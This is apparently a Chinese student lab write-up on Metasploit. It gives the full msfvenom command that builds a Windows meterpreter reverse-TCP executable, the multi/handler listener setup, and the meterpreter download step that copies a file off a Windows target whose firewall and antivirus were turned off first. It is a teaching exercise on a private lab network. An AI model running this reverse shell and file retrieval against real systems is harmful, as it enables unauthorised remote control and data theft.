二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
P121-123;140-149
在kali中输入命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.214.128 lport=5000 -f exe -o /var/payload.exe
在主机中生产攻击荷载payload.exe,这里我选择生成在var目录下
在kali中输入命令msfconsole打开metasploit
在依次输入命令use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.214.128
set lport 5000
Exploit
打开攻击模块
再将主机生成的payload.exe拖到靶机上运行(需要提前关闭靶机的防火墙和安全软件)
在桌面中创建一个文本文档,命名为loudong2
在输入download命令 download loudong2.txt /home/将靶机中loudong2.txe下载到主机home目录中
最后查看主机home目录找到下载好的loudong2.txt